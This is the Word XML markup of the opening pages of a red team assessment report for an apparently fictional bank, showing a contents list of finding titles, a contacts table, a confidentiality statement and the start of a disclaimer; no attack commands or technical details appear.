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A4FA" w14:textId="5FE5CF3D" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RedTeam4You</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA14069" w14:textId="77777777" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB3800D" w14:textId="21E818D6" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B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04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Red Team Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A76FA" w14:textId="6D9EA979" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B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04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reserve Bank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465BABFA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75574E9F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37DE50DB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6CA45869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011D7B66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035AE116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67CD49F2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513F3FC9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5A7FD92B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262F9F2D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19534E1F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178D2575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40605BDB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53340C06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2E2EBE86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5F842E13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2D237A62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31365D2C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7E4637B7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7EA2EA6B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104436B7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5C042C8F" w14:textId="77777777" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05785301" w14:textId="23F3D376" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
      <w:pPr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 w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:id w:val="24839805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3F7F8DC5" w14:textId="00DBB2CE" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rStyle w:val="Heading1Char"/>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00A04586">
            <w:rPr>
              <w:rStyle w:val="Heading1Char"/>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="59702CF2" w14:textId="537F06F0" w:rsidR="00BE0BDD" w:rsidRDefault="008222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04586">
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00A04586">
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00A04586">
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc136520516" w:history="1">
            <w:r w:rsidR="00BE0BDD" w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Section 1. Key Individuals</w:t>
            </w:r>
            <w:r w:rsidR="00BE0BDD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BE0BDD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BE0BDD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc136520516 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BE0BDD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BE0BDD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BE0BDD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00BE0BDD">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F7930D5" w14:textId="4B905986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17" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Section 2. Confidentiality Statement &amp;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2AF4" w14:textId="05B645F6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18" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Section 3. Assessment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A8BC" w14:textId="416B91B2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19" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding Severity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02D2" w14:textId="69641048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0" w:history="1">
            <w:r w:rsidRPr="00331578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19EA" w14:textId="7C5ABCAB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1" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Client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07F1" w14:textId="338A9BBF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2" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Client Allowances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6B8A" w14:textId="38DCD599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3" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink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4F71" w14:textId="031EF690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4" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Client 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98BD" w14:textId="0DCD50E4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5" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Client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59B6" w14:textId="574DF155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6" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability Overview and Report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66CC" w14:textId="69B49B63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7" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding RTA-001: Remote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651F" w14:textId="1A0134D3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8" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding RTA-002: Weak User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14E8" w14:textId="5338B7AF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29" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding RTA-003: Weak Service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B611" w14:textId="7C297882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30" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding RTA-004: Easily Accessed Hashes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5CFB" w14:textId="116E18F7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31" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding RTA-005: S-I-D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C280" w14:textId="1FEB9A66" w:rsidR="00BE0BDD" w:rsidRDefault="00BE0B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520532" w:history="1">
            <w:r w:rsidRPr="00331578">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding RTA-006: Path to Enterprise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4395" w14:textId="44F2A6FB" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="00A04586">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00A04586">
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="21ADBEF9" w14:textId="2DE406E0" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="Heading1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0" w:name="_Toc136520516"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Section 1. Key Individuals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00A0458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28B" w:rsidRPr="00A04586" w14:paraId="20449624" w14:textId="77777777" w:rsidTr="0082228B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24B7B4D1" w14:textId="27E77EDE" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36A08CC5" w14:textId="2D9E9718" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Position</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4845290C" w14:textId="57EC2372" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0082228B" w:rsidRPr="00A04586" w14:paraId="6AA331D7" w14:textId="77777777" w:rsidTr="00AB0436">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4F32CB04" w14:textId="0F2FDFF9" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B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04586">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Trimento</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Reserve Bank</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0082228B" w:rsidRPr="00A04586" w14:paraId="42EF748E" w14:textId="77777777" w:rsidTr="0082228B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25293E73" w14:textId="7AE6BA69" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Am03bam4n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A4D99D2" w14:textId="77777777" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B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4E12D12C" w14:textId="77777777" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0082228B" w:rsidRPr="00A04586" w14:paraId="5545A090" w14:textId="77777777" w:rsidTr="0072728C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0AB17797" w14:textId="7D6A8154" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B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A04586">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>RedTeam4You</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0082228B" w:rsidRPr="00A04586" w14:paraId="1BE66334" w14:textId="77777777" w:rsidTr="0082228B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0240A252" w14:textId="4A9C3199" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SaintsConnor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="049FE2F5" w14:textId="1C100A82" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04586">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Lead Red Team Operator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D28935" w14:textId="5BD42C21" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r w:rsidRPr="00A04586">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>ssgconnor@proton.me</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62A03A6F" w14:textId="77777777" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C8D534" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796AC548" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="146557C2" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E7D9A3" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3627557B" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1D89CC" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E934F0" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251D6C80" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353453BA" w14:textId="1339FA66" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="00A04586">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc136520517"/>
      <w:r w:rsidRPr="00A0458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Section 2. Confidentiality Statement &amp; Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0A2C6DAA" w14:textId="50864407" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">This report is the exclusive document for RedTeam4You and authorised by use to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Trimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reserve Bank. This document can/does contain sensitive information, which may be proprietary or confidential. Any distribution, disclosure, duplication in any shape or form requires both parties (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Trimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reserve Bank, RedTeam4You) to give full consent and permission to do so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC2FF8" w14:textId="77777777" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9056DE" w14:textId="312E292D" w:rsidR="0082228B" w:rsidRPr="00A04586" w:rsidRDefault="0082228B" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Trimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reserve Bank reserves the right to disclose this document to key stakeholders within their government under strict non-disclosure agreements which can be audited at RedTeam4You’s discretion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2BDE13" w14:textId="77777777" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E449DDB" w14:textId="050BAC30" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA667C" w14:textId="01179837" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">This document, provides a brief description of issues located within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Trimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reserve Bank Networking Infrastructure as of 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> June 2023. The findings and recommendations are based on information gathered within the assessment taking place between the 28</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> May to the 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of June, of 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3B54F3" w14:textId="59B2A49E" w:rsidR="00A04586" w:rsidRPr="00A04586" w:rsidRDefault="00A04586" w:rsidP="0082228B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">This document does not include all avenues any potential adversary may take, due to its time-gated operation, RedTeam4You (henceforth known as RT4U) used the path of minimal or least resistance. RT4U would recommend that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Trimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04586">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
